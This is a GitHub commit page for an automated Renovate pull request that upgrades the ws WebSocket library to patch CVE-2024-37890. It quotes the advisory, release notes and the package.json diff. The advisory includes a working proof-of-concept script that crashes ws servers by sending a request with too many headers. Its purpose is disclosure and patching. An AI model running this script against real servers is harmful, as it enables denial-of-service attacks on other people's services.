Update dependency ws to v7.5.10 [SECURITY] (#259)
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`7.5.7` -> `7.5.10`](https://renovatebot.com/diffs/npm/ws/7.5.7/7.5.10) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/7.5.7/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/7.5.7/7.5.10?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

### GitHub Vulnerability Alerts

#### [CVE-2024-37890](https://togithub.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q)

### Impact

A request with a number of headers exceeding the [`server.maxHeadersCount`][] threshold could be used to crash a ws server.

### Proof of concept

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

### Patches

The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6).

### Workarounds

In vulnerable versions of ws, the issue can be mitigated in the
following ways:

1. Reduce the maximum allowed length of the request headers using the
[`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options
so that no more headers than the `server.maxHeadersCount` limit can be
sent.
2. Set `server.maxHeadersCount` to `0` so that no limit is applied.

### Credits

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in websockets/ws#2230.

### References

- websockets/ws#2230
- websockets/ws#2231

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize
[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v7.5.10`](https://togithub.com/websockets/ws/releases/tag/7.5.10)

[Compare Source](https://togithub.com/websockets/ws/compare/7.5.9...7.5.10)

### Bug fixes

- Backported [`e55e510`](https://togithub.com/websockets/ws/commit/e55e5106) to the 7.x release line ([`22c2876`](https://togithub.com/websockets/ws/commit/22c28763)).

### [`v7.5.9`](https://togithub.com/websockets/ws/releases/tag/7.5.9)

[Compare Source](https://togithub.com/websockets/ws/compare/7.5.8...7.5.9)

### Bug fixes

- Backported [`bc8bd34`](https://togithub.com/websockets/ws/commit/bc8bd34e) to the 7.x release line ([`0435e6e`](https://togithub.com/websockets/ws/commit/0435e6e1)).

### [`v7.5.8`](https://togithub.com/websockets/ws/releases/tag/7.5.8)

[Compare Source](https://togithub.com/websockets/ws/compare/7.5.7...7.5.8)

### Bug fixes

- Backported [`0fdcc0a`](https://togithub.com/websockets/ws/commit/0fdcc0af) to the 7.x release line ([`2758ed3`](https://togithub.com/websockets/ws/commit/2758ed35)).
- Backported [`d68ba9e`](https://togithub.com/websockets/ws/commit/d68ba9e1) to the 7.x release line ([`dc1781b`](https://togithub.com/websockets/ws/commit/dc1781bc)).

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View the
[repository job
log](https://developer.mend.io/github/gagoar/invoke-aws-lambda).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
renovate[bot] committed Aug 6, 2024
1 parent aeda4df commit 33668e9
Showing 2 changed files with 8 additions and 8 deletions.
14 changes: 7 additions & 7 deletions package-lock.json


2 changes: 1 addition & 1 deletion package.json
Expand Up @@ -119,6 +119,6 @@
"tslib": "2.4.0",
"typescript": "4.6.4",
"utf-8-validate": "5.0.9",
"ws": "7.5.7"
"ws": "7.5.10"
}
}
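Review bot: the package.json hunk pins `"ws": "7.5.10"`, which the release notes above identify as the 7.x backport of the CVE-2024-37890 fix, but the companion package-lock.json hunk (7 additions, 7 deletions) is not rendered on this page, so the lock's resolved version and integrity hash for ws cannot be checked from the visible lines; confirm that the lock entry also resolves to 7.5.10 before merging, since automerge is disabled for this PR and the merge is manual.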
